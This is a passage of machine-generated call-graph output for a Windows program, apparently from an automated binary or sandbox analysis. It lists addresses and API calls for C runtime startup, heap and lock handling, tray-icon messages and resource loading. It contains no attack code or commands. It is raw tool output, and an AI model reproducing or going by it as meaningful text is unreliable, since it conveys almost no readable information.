affa14 99022->99025 99023->99021 99028 ab14db 61 API calls 99023->99028 99025->99021 99029 ab14db 61 API calls 99025->99029 99027->98980 99028->99023 99029->99025 99030->98995 99031->99008 99033 aa4659 Mailbox 99032->99033 99034 add6ec 99033->99034 99039 aa4663 99033->99039 99035 ac0fe6 Mailbox 59 API calls 99034->99035 99037 add6f8 99035->99037 99036 aa466a 99036->99012 99039->99036 99040 aa5190 59 API calls Mailbox 99039->99040 99040->99039 99042 aa3b3f 99041->99042 99048 aa3b67 99041->99048 99043 aa3b4d 99042->99043 99044 aa3b31 59 API calls 99042->99044 99045 aa3b53 99043->99045 99046 aa3b31 59 API calls 99043->99046 99044->99043 99045->99048 99051 aa5190 59 API calls Mailbox 99045->99051 99046->99045 99048->98614 99049->98617 99050->98609 99051->99048 99053 aa3c43 99052->99053 99054 aa3e11 99052->99054 99055 ab1207 59 API calls 99053->99055 99058 aa3c54 99053->99058 99054->98631 99056 aa3e73 99055->99056 99057 ac2f70 __cinit 67 API calls 99056->99057 99057->99058 99058->98631 99059->98644 99060->98271 99061->98268 99062->98167 99063->98163 99064->98165 99065->98163 99066->98164 99068 ac59b7 99067->99068 99072 ac5948 99067->99072 99093 ac35d1 DecodePointer 99068->99093 99070 ac59bd 99094 ac8d58 58 API calls __getptd_noexit 99070->99094 99071 ac5953 99071->99072 99087 aca39b 58 API calls __NMSG_WRITE 99071->99087 99088 aca3f8 58 API calls 6 library calls 99071->99088 99089 ac32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99071->99089 99072->99071 99075 ac597b RtlAllocateHeap 99072->99075 99078 ac59a3 99072->99078 99082 ac59a1 99072->99082 99090 ac35d1 DecodePointer 99072->99090 99075->99072 99076 ac59af 99075->99076 99076->98172 99091 ac8d58 58 API calls __getptd_noexit 99078->99091 99092 ac8d58 58 API calls __getptd_noexit 99082->99092 99084->98172 99085->98177 99086->98179 99087->99071 99088->99071 99090->99072 99091->99082 99092->99076 99093->99070 99094->99076 99096 ac2e80 ___lock_fhandle 99095->99096 99103 ac3447 99096->99103 99102 ac2ea7 ___lock_fhandle 99102->98077 99120 ac9e3b 99103->99120 99105 ac2e89 99106 ac2eb8 DecodePointer DecodePointer 99105->99106 99107 ac2ee5 99106->99107 99108 ac2e95 99106->99108 99107->99108 99166 ac89d4 59 API calls 2 library calls 99107->99166 99117 ac2eb2 99108->99117 99110 ac2f48 EncodePointer EncodePointer 99110->99108 99111 ac2ef7 99111->99110 99112 ac2f1c 99111->99112 99167 ac8a94 61 API calls __realloc_crt 99111->99167 99112->99108 99116 ac2f36 EncodePointer 99112->99116 99168 ac8a94 61 API calls __realloc_crt 99112->99168 99115 ac2f30 99115->99108 99115->99116 99116->99110 99169 ac3450 99117->99169 99121 ac9e4c 99120->99121 99122 ac9e5f EnterCriticalSection 99120->99122 99127 ac9ec3 99121->99127 99122->99105 99124 ac9e52 99124->99122 99151 ac32e5 58 API calls 3 library calls 99124->99151 99128 ac9ecf ___lock_fhandle 99127->99128 99129 ac9ed8 99128->99129 99130 ac9ef0 99128->99130 99152 aca39b 58 API calls __NMSG_WRITE 99129->99152 99138 ac9f11 ___lock_fhandle 99130->99138 99155 ac8a4d 58 API calls 2 library calls 99130->99155 99133 ac9edd 99153 aca3f8 58 API calls 6 library calls 99133->99153 99134 ac9f05 99136 ac9f0c 99134->99136 99137 ac9f1b 99134->99137 99156 ac8d58 58 API calls __getptd_noexit 99136->99156 99142 ac9e3b __lock 58 API calls 99137->99142 99138->99124 99139 ac9ee4 99154 ac32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99139->99154 99144 ac9f22 99142->99144 99145 ac9f2f 99144->99145 99146 ac9f47 99144->99146 99157 aca05b InitializeCriticalSectionAndSpinCount 99145->99157 99158 ac2f85 99146->99158 99149 ac9f3b 99164 ac9f63 LeaveCriticalSection _doexit 99149->99164 99152->99133 99153->99139 99155->99134 99156->99138 99157->99149 99159 ac2f8e RtlFreeHeap 99158->99159 99163 ac2fb7 __dosmaperr 99158->99163 99160 ac2fa3 99159->99160 99159->99163 99165 ac8d58 58 API calls __getptd_noexit 99160->99165 99162 ac2fa9 GetLastError 99162->99163 99163->99149 99164->99138 99165->99162 99166->99111 99167->99112 99168->99115 99172 ac9fa5 LeaveCriticalSection 99169->99172 99171 ac2eb7 99171->99102 99172->99171 99173 aa9a88 99174 aa86e0 274 API calls 99173->99174 99175 aa9a96 99174->99175 99176 aa9a6c 99179 aa829c 99176->99179 99178 aa9a78 99180 aa82b4 99179->99180 99187 aa8308 99179->99187 99181 aa53b0 274 API calls 99180->99181 99180->99187 99185 aa82eb 99181->99185 99183 ae0ed8 99183->99183 99184 aa8331 99184->99178 99185->99184 99186 aa523c 59 API calls 99185->99186 99186->99187 99187->99184 99188 b0a48d 89 API calls 4 library calls 99187->99188 99188->99183 99189 ab4d83 99190 ab4dba 99189->99190 99191 ab4dd8 99190->99191 99192 ab4e37 99190->99192 99233 ab4e35 99190->99233 99196 ab4ead PostQuitMessage 99191->99196 99197 ab4de5 99191->99197 99194 ab4e3d 99192->99194 99195 af09c2 99192->99195 99193 ab4e1a DefWindowProcW 99230 ab4e28 99193->99230 99198 ab4e42 99194->99198 99199 ab4e65 SetTimer RegisterWindowMessageW 99194->99199 99248 aac460 10 API calls Mailbox 99195->99248 99196->99230 99200 af0a35 99197->99200 99201 ab4df0 99197->99201 99204 ab4e49 KillTimer 99198->99204 99205 af0965 99198->99205 99206 ab4e8e CreatePopupMenu 99199->99206 99199->99230 99262 b02cce 97 API calls _memset 99200->99262 99207 ab4df8 99201->99207 99208 ab4eb7 99201->99208 99203 af09e9 99249 aac483 274 API calls Mailbox 99203->99249 99241 ab5ac3 99204->99241 99213 af099e MoveWindow 99205->99213 99214 af096a 99205->99214 99206->99230 99216 af0a1a 99207->99216 99217 ab4e03 99207->99217 99234 ab5b29 99208->99234 99210 af0a47 99210->99193 99210->99230 99213->99230 99220 af096e 99214->99220 99221 af098d SetFocus 99214->99221 99216->99193 99261 af8854 59 API calls Mailbox 99216->99261 99218 ab4e9b 99217->99218 99219 ab4e0e 99217->99219 99246 ab5bd7 107 API calls _memset 99218->99246 99219->99193 99229 ab5ac3 Shell_NotifyIconW 99219->99229 99220->99219 99224 af0977 99220->99224 99221->99230 99247 aac460 10 API calls Mailbox 99224->99247 99227 ab4eab 99227->99230 99231 af0a0e 99229->99231 99250 ab59d3 99231->99250 99233->99193 99235 ab5bc2 99234->99235 99236 ab5b40 _memset 99234->99236 99235->99230 99263 ab56f8 99236->99263 99238 ab5bab KillTimer SetTimer 99238->99235 99239 ab5b67 99239->99238 99240 af0d6e Shell_NotifyIconW 99239->99240 99240->99238 99242 ab4e5c 99241->99242 99243 ab5ad5 _memset 99241->99243 99245 aa34e4 DeleteObject DestroyWindow Mailbox 99242->99245 99244 ab5af4 Shell_NotifyIconW 99243->99244 99244->99242 99245->99230 99246->99227 99247->99230 99248->99203 99249->99219 99251 ab59fe _memset 99250->99251 99300 ab5800 99251->99300 99254 ab5a83 99256 ab5ab9 Shell_NotifyIconW 99254->99256 99257 ab5a9d Shell_NotifyIconW 99254->99257 99258 ab5aab 99256->99258 99257->99258 99259 ab56f8 87 API calls 99258->99259 99260 ab5ab2 99259->99260 99260->99233 99261->99233 99262->99210 99264 ab5715 99263->99264 99284 ab57fa Mailbox 99263->99284 99293 ab162d 99264->99293 99267 af0c4c LoadStringW 99271 af0c66 99267->99271 99268 ab5730 99269 ab1821 59 API calls 99268->99269 99270 ab5745 99269->99270 99272 ab5752 99270->99272 99278 af0c74 99270->99278 99273 ab1c9c 59 API calls 99271->99273 99272->99271 99274 ab5760 99272->99274 99279 ab5778 _memset _wcscpy 99273->99279 99275 ab1900 59 API calls 99274->99275 99276 ab576a 99275->99276 99277 ab17e0 59 API calls 99276->99277 99277->99279 99278->99279 99280 af0cb7 Mailbox 99278->99280 99281 ab1207 59 API calls 99278->99281 99282 ab57e0 Shell_NotifyIconW 99279->99282 99299 ac38c8 83 API calls 3 library calls 99280->99299 99283 af0c9e 99281->99283 99282->99284 99298 b00252 60 API calls Mailbox 99283->99298 99284->99239 99287 af0ca9 99289 ab17e0 59 API calls 99287->99289 99288 af0cd6 99290 ab1900 59 API calls 99288->99290 99289->99280 99291 af0ce7 99290->99291 99292 ab1900 59 API calls 99291->99292 99292->99279 99294 ac0fe6 Mailbox 59 API calls 99293->99294 99295 ab1652 99294->99295 99296 ac0fe6 Mailbox 59 API calls 99295->99296 99297 ab1660 99296->99297 99297->99267 99297->99268 99298->99287 99299->99288 99301 ab581c 99300->99301 99302 ab5810 99300->99302 99301->99302 99303 ab5821 DestroyIcon 99301->99303 99302->99254 99304 b034dd 62 API calls _W_store_winword 99302->99304 99303->99302 99304->99254 99305 aa1066 99310 aaaaaa 99305->99310 99307 aa106c 99308 ac2f70 __cinit 67 API calls 99307->99308 99309 aa1076 99308->99309 99311 aaaacb 99310->99311 99343 ac02eb 99311->99343 99315 aaab12 99316 ab1207 59 API calls 99315->99316 99317 aaab1c 99316->99317 99318 ab1207 59 API calls 99317->99318 99319 aaab26 99318->99319 99320 ab1207 59 API calls 99319->99320 99321 aaab30 99320->99321 99322 ab1207 59 API calls 99321->99322 99323 aaab6e 99322->99323 99324 ab1207 59 API calls 99323->99324 99325 aaac39 99324->99325 99353 ac0588 99325->99353 99329 aaac6b 99330 ab1207 59 API calls 99329->99330 99331 aaac75 99330->99331 99381 abfe2b 99331->99381 99333 aaacbc 99334 aaaccc GetStdHandle 99333->99334 99335 aaad18 99334->99335 99336 ae2f39 99334->99336 99337 aaad20 OleInitialize 99335->99337 99336->99335 99338 ae2f42 99336->99338 99337->99307 99388 b070f3 64 API calls Mailbox 99338->99388 99340 ae2f49 99389 b077c2 CreateThread 99340->99389 99342 ae2f55 CloseHandle 99342->99337 99390 ac03c4 99343->99390 99346 ac03c4 59 API calls 99347 ac032d 99346->99347 99348 ab1207 59 API calls 99347->99348 99349 ac0339 99348->99349 99350 ab1821 59 API calls 99349->99350 99351 aaaad1 99350->99351 99352 ac07bb 6 API calls 99351->99352 99352->99315 99354 ab1207 59 API calls 99353->99354 99355 ac0598 99354->99355 99356 ab1207 59 API calls 99355->99356 99357 ac05a0 99356->99357 99397 ab10c3 99357->99397 99360 ab10c3 59 API calls 99361 ac05b0 99360->99361 99362 ab1207 59 API calls 99361->99362 99363 ac05bb 99362->99363 99364 ac0fe6 Mailbox 59 API calls 99363->99364 99365 aaac43 99364->99365 99366 abff4c 99365->99366 99367 abff5a 99366->99367 99368 ab1207 59 API calls 99367->99368 99369 abff65 99368->99369 99370 ab1207 59 API calls 99369->99370 99371 abff70 99370->99371 99372 ab1207 59 API calls 99371->99372 99373 abff7b 99372->99373 99374 ab1207 59 API calls 99373->99374 99375 abff86 99374->99375 99376 ab10c3 59 API calls 99375->99376 99377 abff91 99376->99377 99378 ac0fe6 Mailbox 59 API calls 99377->99378 99379 abff98 RegisterWindowMessageW 99378->99379 99379->99329 99382 abfe3b 99381->99382 99383 af620c 99381->99383 99384 ac0fe6 Mailbox 59 API calls 99382->99384 99400 b0a12a 59 API calls 99383->99400 99387 abfe43 99384->99387 99386 af6217 99387->99333 99388->99340 99389->99342 99401 b077a8 65 API calls 99389->99401 99391 ab1207 59 API calls 99390->99391 99392 ac03cf 99391->99392 99393 ab1207 59 API calls 99392->99393 99394 ac03d7 99393->99394 99395 ab1207 59 API calls 99394->99395 99396 ac0323 99395->99396 99396->99346 99398 ab1207 59 API calls 99397->99398 99399 ab10cb 99398->99399 99399->99360 99400->99386 99402 ade463 99414 aa373a 99402->99414 99404 ade479 99405 ade48f 99404->99405 99406 ade4fa 99404->99406 99423 aa5376 60 API calls 99405->99423 99408 aab020 274 API calls 99406->99408 99413 ade4ee Mailbox 99408->99413 99410 ade4ce 99410->99413 99424 b0890a 59 API calls Mailbox 99410->99424 99411 adf046 Mailbox 99413->99411 99425 b0a48d 89 API calls 4 library calls 99413->99425 99415 aa3758 99414->99415 99416 aa3746 99414->99416 99417 aa375e 99415->99417 99418 aa3787 99415->99418 99419 aa523c 59 API calls 99416->99419 99420 ac0fe6 Mailbox 59 API calls 99417->99420 99421 aa523c 59 API calls 99418->99421 99422 aa3750 99419->99422 99420->99422 99421->99422 99422->99404 99423->99410 99424->99413 99425->99411 99426 ac7e83 99427 ac7e8f ___lock_fhandle 99426->99427 99463 aca038 GetStartupInfoW 99427->99463 99429 ac7e94 99465 ac8dac GetProcessHeap 99429->99465 99431 ac7eec 99432 ac7ef7 99431->99432 99548 ac7fd3 58 API calls 3 library calls 99431->99548 99466 ac9d16 99432->99466 99435 ac7efd 99436 ac7f08 __RTC_Initialize 99435->99436 99549 ac7fd3 58 API calls 3 library calls 99435->99549 99487 acd802 99436->99487 99439 ac7f17 99440 ac7f23 GetCommandLineW 99439->99440 99550 ac7fd3 58 API calls 3 library calls 99439->99550 99506 ad5153 GetEnvironmentStringsW 99440->99506 99443 ac7f22 99443->99440 99446 ac7f3d 99447 ac7f48 99446->99447 99551 ac32e5 58 API calls 3 library calls 99446->99551 99516 ad4f88 99447->99516 99450 ac7f4e 99453 ac7f59 99450->99453 99552 ac32e5 58 API calls 3 library calls 99450->99552 99530 ac331f 99453->99530 99454 ac7f61 99455 ac7f6c __wwincmdln 99454->99455 99553 ac32e5 58 API calls 3 library calls 99454->99553 99536 ab5f8b 99455->99536 99458 ac7f80 99459 ac7f8f 99458->99459 99554 ac3588 58 API calls _doexit 99458->99554 99555 ac3310 58 API calls _doexit 99459->99555 99462 ac7f94 ___lock_fhandle 99464 aca04e 99463->99464 99464->99429 99465->99431 99556 ac33b7 36 API calls 2 library calls 99466->99556 99468 ac9d1b 99557 ac9f6c InitializeCriticalSectionAndSpinCount ___lock_fhandle 99468->99557 99470 ac9d20 99471 ac9d24 99470->99471 99559 ac9fba TlsAlloc 99470->99559 99558 ac9d8c 61 API calls 2 library calls 99471->99558 99474 ac9d29 99474->99435 99475 ac9d36 99475->99471 99476 ac9d41 99475->99476 99560 ac8a05 99476->99560 99479 ac9d83 99568 ac9d8c 61 API calls 2 library calls 99479->99568 99482 ac9d88 99482->99435 99483 ac9d62 99483->99479 99484 ac9d68 99483->99484 99567 ac9c63 58 API calls 4 library calls 99484->99567 99486 ac9d70 GetCurrentThreadId 99486->99435 99488 acd80e ___lock_fhandle 99487->99488 99489 ac9e3b __lock 58 API calls 99488->99489 99490 acd815 99489->99490 99491 ac8a05 __calloc_crt 58 API calls 99490->99491 99492 acd826 99491->99492 99493 acd891 GetStartupInfoW 99492->99493 99496 acd831 ___lock_fhandle @_EH4_CallFilterFunc@8 99492->99496 99494 acd9d5 99493->99494 99495 acd8a6 99493->99495 99497 acda9d 99494->99497 99500 acda22 GetStdHandle 99494->99500 99501 acda35 GetFileType 99494->99501 99581 aca05b InitializeCriticalSectionAndSpinCount 99494->99581 99495->99494 99499 ac8a05 __calloc_crt 58 API calls 99495->99499 99503 acd8f4 99495->99503 99496->99439 99582 acdaad LeaveCriticalSection _doexit 99497->99582 99499->99495 99500->99494 99501->99494 99502 acd928 GetFileType 99502->99503 99503->99494 99503->99502 99580 aca05b InitializeCriticalSectionAndSpinCount 99503->99580 99507 ac7f33 99506->99507 99508 ad5164 99506->99508 99512 ad4d4b GetModuleFileNameW 99507->99512 99583 ac8a4d 58 API calls 2 library calls 99508->99583 99510 ad518a _memmove 99511 ad51a0 FreeEnvironmentStringsW 99510->99511 99511->99507 99513 ad4d7f _wparse_cmdline 99512->99513 99515 ad4dbf _wparse_cmdline 99513->99515 99584 ac8a4d 58 API calls 2 library calls 99513->99584 99515->99446 99517 ad4f99 99516->99517 99518 ad4fa1 __wsetenvp 99516->99518 99517->99450 99519 ac8a05 __calloc_crt 58 API calls 99518->99519 99523 ad4fca __wsetenvp 99519->99523 99520 ad5021 99521 ac2f85 _free 58 API calls 99520->99521 99521->99517 99522 ac8a05 __calloc_crt 58 API calls 99522->99523 99523->99517 99523->99520 99523->99522 99524 ad5046 99523->99524 99527 ad505d 99523->99527 99585 ad4837 58 API calls 2 library calls 99523->99585 99525 ac2f85 _free 58 API calls 99524->99525 99525->99517 99586 ac8ff6 IsProcessorFeaturePresent 99527->99586 99529 ad5069 99529->99450 99531 ac332b __IsNonwritableInCurrentImage 99530->99531 99609 aca701 99531->99609 99533 ac3349 __initterm_e 99534 ac2f70 __cinit 67 API calls 99533->99534 99535 ac3368 _doexit __IsNonwritableInCurrentImage 99533->99535 99534->99535 99535->99454 99537 ab6044 99536->99537 99538 ab5fa5 99536->99538 99537->99458 99539 ab5fdf IsThemeActive 99538->99539 99612 ac359c 99539->99612 99543 ab600b 99624 ab5f00 SystemParametersInfoW SystemParametersInfoW 99543->99624 99545 ab6017 99625 ab5240 99545->99625 99547 ab601f SystemParametersInfoW 99547->99537 99548->99432 99549->99436 99550->99443 99554->99459 99555->99462 99556->99468 99557->99470 99558->99474 99559->99475 99561 ac8a0c 99560->99561 99563 ac8a47 99561->99563 99565 ac8a2a 99561->99565 99569 ad5426 99561->99569 99563->99479 99566 aca016 TlsSetValue 99563->99566 99565->99561 99565->99563 99577 aca362 Sleep 99565->99577 99566->99483 99567->99486 99568->99482 99570 ad5431 99569->99570 99576 ad544c 99569->99576 99571 ad543d 99570->99571 99570->99576 99578 ac8d58 58 API calls __getptd_noexit 99571->99578 99572 ad545c HeapAlloc 99574 ad5442 99572->99574 99572->99576 99574->99561 99576->99572 99576->99574 99579 ac35d1 DecodePointer 99576->99579 99577->99565 99578->99574 99579->99576 99580->99503 99581->99494 99582->99496 99583->99510 99584->99515 99585->99523 99587 ac9001 99586->99587 99592 ac8e89 99587->99592 99591 ac901c 99591->99529 99593 ac8ea3 _memset __call_reportfault 99592->99593 99594 ac8ec3 IsDebuggerPresent 99593->99594 99600 aca385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99594->99600 99597 ac8f87 __call_reportfault 99601 acc826 99597->99601 99598 ac8faa 99599 aca370 GetCurrentProcess TerminateProcess 99598->99599 99599->99591 99600->99597 99602 acc82e 99601->99602 99603 acc830 IsProcessorFeaturePresent 99601->99603 99602->99598 99605 ad5b3a 99603->99605 99608 ad5ae9 5 API calls 2 library calls 99605->99608 99607 ad5c1d 99607->99598 99608->99607 99610 aca704 EncodePointer 99609->99610 99610->99610 99611 aca71e 99610->99611 99611->99533 99613 ac9e3b __lock 58 API calls 99612->99613 99614 ac35a7 DecodePointer EncodePointer 99613->99614 99677 ac9fa5 LeaveCriticalSection 99614->99677 99616 ab6004 99617 ac3604 99616->99617 99618 ac360e 99617->99618 99619 ac3628 99617->99619 99618->99619 99678 ac8d58 58 API calls __getptd_noexit 99618->99678 99619->99543 99621 ac3618 99679 ac8fe6 9 API calls __ftell_nolock 99621->99679 99623 ac3623 99623->99543 99624->99545 99626 ab524d __ftell_nolock 99625->99626 99627 ab1207 59 API calls 99626->99627 99628 ab5258 GetCurrentDirectoryW 99627->99628 99680 ab4ec8 99628->99680 99630 ab527e IsDebuggerPresent 99631 ab528c 99630->99631 99632 af0b21 MessageBoxA 99630->99632 99633 af0b39 99631->99633 99634 ab52a0 99631->99634 99632->99633 99788 ab314d 59 API calls Mailbox 99633->99788 99748 ab31bf 99634->99748 99637 af0b49 99644 af0b5f SetCurrentDirectoryW 99637->99644 99643 ab536c Mailbox 99643->99547 99644->99643 99677->99616 99678->99621 99679->99623 99681 ab1207 59 API calls 99680->99681 99682 ab4ede 99681->99682 99797 ab5420 99682->99797 99684 ab4efc 99685 ab19e1 59 API calls 99684->99685 99686 ab4f10 99685->99686 99687 ab1c9c 59 API calls 99686->99687 99688 ab4f1b 99687->99688 99811 aa477a 99688->99811 99691 ab1a36 59 API calls 99692 ab4f34 99691->99692 99693 aa39be 68 API calls 99692->99693 99694 ab4f44 Mailbox 99693->99694 99695 ab1a36 59 API calls 99694->99695 99696 ab4f68 99695->99696 99697 aa39be 68 API calls 99696->99697 99698 ab4f77 Mailbox 99697->99698 99699 ab1207 59 API calls 99698->99699 99700 ab4f94 99699->99700 99814 ab55bc 99700->99814 99703 ac312d _W_store_winword 60 API calls 99704 ab4fae 99703->99704 99705 ab4fb8 99704->99705 99706 af0a54 99704->99706 99708 ac312d _W_store_winword 60 API calls 99705->99708 99707 ab55bc 59 API calls 99706->99707 99710 af0a68 99707->99710 99709 ab4fc3 99708->99709 99709->99710 99711 ab4fcd 99709->99711 99712 ab55bc 59 API calls 99710->99712 99713 ac312d _W_store_winword 60 API calls 99711->99713 99714 af0a84 99712->99714 99715 ab4fd8 99713->99715 99717 ac00cf 61 API calls 99714->99717 99715->99714 99716 ab4fe2 99715->99716 99718 ac312d _W_store_winword 60 API calls 99716->99718 99719 af0aa7 99717->99719 99720 ab4fed 99718->99720 99721 ab55bc 59 API calls 99719->99721 99722 af0ad0 99720->99722 99723 ab4ff7 99720->99723 99724 af0ab3 99721->99724 99726 ab55bc 59 API calls 99722->99726 99725 ab501b 99723->99725 99728 ab1c9c 59 API calls 99723->99728 99727 ab1c9c 59 API calls 99724->99727 99733 aa47be 59 API calls 99725->99733 99729 af0aee 99726->99729 99731 af0ac1 99727->99731 99732 ab500e 99728->99732 99730 ab1c9c 59 API calls 99729->99730 99734 af0afc 99730->99734 99735 ab55bc 59 API calls 99731->99735 99736 ab55bc 59 API calls 99732->99736 99737 ab502a 99733->99737 99739 ab55bc 59 API calls 99734->99739 99735->99722 99736->99725 99738 aa4540 59 API calls 99737->99738 99740 ab5038 99738->99740 99741 af0b0b 99739->99741 99820 aa43d0 99740->99820 99741->99741 99743 aa477a 59 API calls 99745 ab5055 99743->99745 99744 aa43d0 59 API calls 99744->99745 99745->99743 99745->99744 99746 ab55bc 59 API calls 99745->99746 99747 ab509b Mailbox 99745->99747 99746->99745 99747->99630 99749 ab31cc __ftell_nolock 99748->99749 99750 ab31e5 99749->99750 99751 af0314 _memset 99749->99751 99752 ac0284 60 API calls 99750->99752 99753 af0330 GetOpenFileNameW 99751->99753 99754 ab31ee 99752->99754 99756 af037f 99753->99756 99836 ac09c5 99754->99836 99758 ab1821 59 API calls 99756->99758 99760 af0394 99758->99760 99760->99760 99761 ab3203 99854 ab278a 99761->99854 99788->99637 99798 ab542d __ftell_nolock 99797->99798 99799 ab1821 59 API calls 99798->99799 99803 ab5590 Mailbox 99798->99803 99801 ab545f 99799->99801 99800 ab1609 59 API calls 99800->99801 99801->99800 99809 ab5495 Mailbox 99801->99809 99802 ab5563 99802->99803 99804 ab1a36 59 API calls 99802->99804 99803->99684 99805 ab5584 99804->99805 99808 ab4c94 59 API calls 99805->99808 99806 ab1a36 59 API calls 99806->99809 99807 ab1609 59 API calls 99807->99809 99808->99803 99809->99802 99809->99803 99809->99806 99809->99807 99829 ab4c94 99809->99829 99812 ac0fe6 Mailbox 59 API calls 99811->99812 99813 aa4787 99812->99813 99813->99691 99815 ab55df 99814->99815 99816 ab55c6 99814->99816 99818 ab1821 59 API calls 99815->99818 99817 ab1c9c 59 API calls 99816->99817 99819 ab4fa0 99817->99819 99818->99819 99819->99703 99821 add6c9 99820->99821 99826 aa43e7 99820->99826 99821->99826 99835 aa40cb 59 API calls Mailbox 99821->99835 99823 aa44e8 99827 ac0fe6 Mailbox 59 API calls 99823->99827 99824 aa4530 99825 aa523c 59 API calls 99824->99825 99828 aa44ef 99825->99828 99826->99823 99826->99824 99826->99828 99827->99828 99828->99745 99830 ab4ca2 99829->99830 99831 ab4cc4 _memmove 99829->99831 99833 ac0fe6 Mailbox 59 API calls 99830->99833 99832 ac0fe6 Mailbox 59 API calls 99831->99832 99834 ab4cd8 99832->99834 99833->99831 99834->99809 99835->99826 99837 ad1b70 __ftell_nolock 99836->99837 99838 ac09d2 GetLongPathNameW 99837->99838 99839 ab1821 59 API calls 99838->99839 99840 ab31f7 99839->99840 99841 ab2f3d 99840->99841 99842 ab1207 59 API calls 99841->99842 99843 ab2f4f 99842->99843 99844 ac0284 60 API calls 99843->99844 99845 ab2f5a 99844->99845 99846 ab2f65 99845->99846 99850 af0177 99845->99850 99847 ab4c94 59 API calls 99846->99847 99849 ab2f71 99847->99849 99888 aa1307 99849->99888 99851 af0191 99850->99851 99894 ab151f 61 API calls 99850->99894 99853 ab2f84 Mailbox 99853->99761 99895 ab49c2 99854->99895 99857 aef8d6 100012 b09b16 99857->100012 99859 ab49c2 136 API calls 99861 ab27c3 99859->99861 99861->99857 99864 ab27cb 99861->99864 99862 aef8eb 99863 aef908 99866 ac0fe6 Mailbox 59 API calls 99863->99866 99867 ab27d7 99864->99867 99868 aef8f3 99864->99868 99885 aef94d Mailbox 99866->99885 99919 ab29be 99867->99919 100070 b047e8 90 API calls _wprintf 99868->100070 99872 aef901 99872->99863 99873 aefb01 99881 aefb12 99884 ab1a36 59 API calls 99884->99885 99885->99873 99885->99881 99885->99884 100047 affef8 99885->100047 100050 ab343f 99885->100050 100058 ab3297 99885->100058 99889 aa1319 99888->99889 99893 aa1338 _memmove 99888->99893 99892 ac0fe6 Mailbox 59 API calls 99889->99892 99890 ac0fe6 Mailbox 59 API calls 99891 aa134f 99890->99891 99891->99853 99892->99893 99893->99890 99894->99850 100074 ab4b29 99895->100074 99900 af08bb 99902 ab4a2f 84 API calls 99900->99902 99901 ab49ed LoadLibraryExW 100084 ab4ade 99901->100084 99904 af08c2 99902->99904 99906 ab4ade 3 API calls 99904->99906 99908 af08ca 99906->99908 100110 ab4ab2 99908->100110 99909 ab4a14 99909->99908 99910 ab4a20 99909->99910 99912 ab4a2f 84 API calls 99910->99912 99914 ab27af 99912->99914 99914->99857 99914->99859 99916 af08f1 100118 ab4a6e 99916->100118 99920 aefd14 99919->99920 99921 ab29e7 99919->99921 100491 afff5c 89 API calls 4 library calls 99920->100491 100475 ab3df7 60 API calls Mailbox 99921->100475 99924 ab2a09 100476 ab3e47 67 API calls 99924->100476 99925 aefd27 100492 afff5c 89 API calls 4 library calls 99925->100492 100013 ab4a8c 85 API calls 100012->100013 100014 b09b85 100013->100014 100501 b09cf1 100014->100501 100017 ab4ab2 74 API calls 100018 b09bb4 100017->100018 100045 aef8e7 100045->99862 100045->99863 100070->99872 100123 ab4b77 100074->100123 100077 ab4b50 100079 ab49d4 100077->100079 100080 ab4b60 FreeLibrary 100077->100080 100078 ab4b77 2 API calls 100078->100077 100081 ac547b 100079->100081 100080->100079 100127 ac5490 100081->100127 100083 ab49e1 100083->99900 100083->99901 100208 ab4baa 100084->100208 100087 ab4b03 100089 ab4a05 100087->100089 100090 ab4b15 FreeLibrary 100087->100090 100088 ab4baa 2 API calls 100088->100087 100091 ab48b0 100089->100091 100090->100089 100092 ac0fe6 Mailbox 59 API calls 100091->100092 100093 ab48c5 100092->100093 100094 ab433f 59 API calls 100093->100094 100095 ab48d1 _memmove 100094->100095 100096 af080a 100095->100096 100097 ab490c 100095->100097 100101 af0817 100096->100101 100217 b09ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100096->100217 100098 ab4a6e 69 API calls 100097->100098 100109 ab4915 100098->100109 100218 b09f5e 95 API calls 100101->100218 100102 ab4ab2 74 API calls 100102->100109 100104 af0859 100212 ab4a8c 100104->100212 100106 ab4a8c 85 API calls 100106->100109 100107 ab4ab2 74 API calls 100108 ab49a0 100107->100108 100108->99909 100109->100102 100109->100104 100109->100106 100109->100108 100111 af0945 100110->100111 100112 ab4ac4 100110->100112 100324 ac5802 100112->100324 100115 b096c4 100449 b0951a 100115->100449 100117 b096da 100117->99916 100119 ab4a7d 100118->100119 100120 af0908 100118->100120 100454 ac5e80 100119->100454 100124 ab4b44 100123->100124 100125 ab4b80 LoadLibraryA 100123->100125 100124->100077 100124->100078 100125->100124 100126 ab4b91 GetProcAddress 100125->100126 100126->100124 100130 ac549c ___lock_fhandle 100127->100130 100128 ac54af 100176 ac8d58 58 API calls __getptd_noexit 100128->100176 100130->100128 100132 ac54e0 100130->100132 100131 ac54b4 100177 ac8fe6 9 API calls __ftell_nolock 100131->100177 100146 ad0718 100132->100146 100135 ac54e5 100136 ac54ee 100135->100136 100137 ac54fb 100135->100137 100178 ac8d58 58 API calls __getptd_noexit 100136->100178 100139 ac5525 100137->100139 100140 ac5505 100137->100140 100161 ad0837 100139->100161 100179 ac8d58 58 API calls __getptd_noexit 100140->100179 100144 ac54bf ___lock_fhandle @_EH4_CallFilterFunc@8 100144->100083 100147 ad0724 ___lock_fhandle 100146->100147 100148 ac9e3b __lock 58 API calls 100147->100148 100159 ad0732 100148->100159 100149 ad07ad 100186 ac8a4d 58 API calls 2 library calls 100149->100186 100150 ad07a6 100181 ad082e 100150->100181 100153 ad07b4 100153->100150 100187 aca05b InitializeCriticalSectionAndSpinCount 100153->100187 100154 ad0823 ___lock_fhandle 100154->100135 100156 ac9ec3 __mtinitlocknum 58 API calls 100156->100159 100158 ad07da EnterCriticalSection 100158->100150 100159->100149 100159->100150 100159->100156 100184 ac6e7d 59 API calls __lock 100159->100184 100185 ac6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100159->100185 100162 ad0857 __wopenfile 100161->100162 100163 ad0871 100162->100163 100175 ad0a2c 100162->100175 100194 ac39fb 60 API calls 3 library calls 100162->100194 100192 ac8d58 58 API calls __getptd_noexit 100163->100192 100165 ad0876 100193 ac8fe6 9 API calls __ftell_nolock 100165->100193 100167 ac5530 100180 ac5552 LeaveCriticalSection LeaveCriticalSection _fseek 100167->100180 100168 ad0a8f 100189 ad87d1 100168->100189 100171 ad0a25 100171->100175 100195 ac39fb 60 API calls 3 library calls 100171->100195 100173 ad0a44 100173->100175 100196 ac39fb 60 API calls 3 library calls 100173->100196 100175->100163 100175->100168 100176->100131 100177->100144 100178->100144 100179->100144 100180->100144 100188 ac9fa5 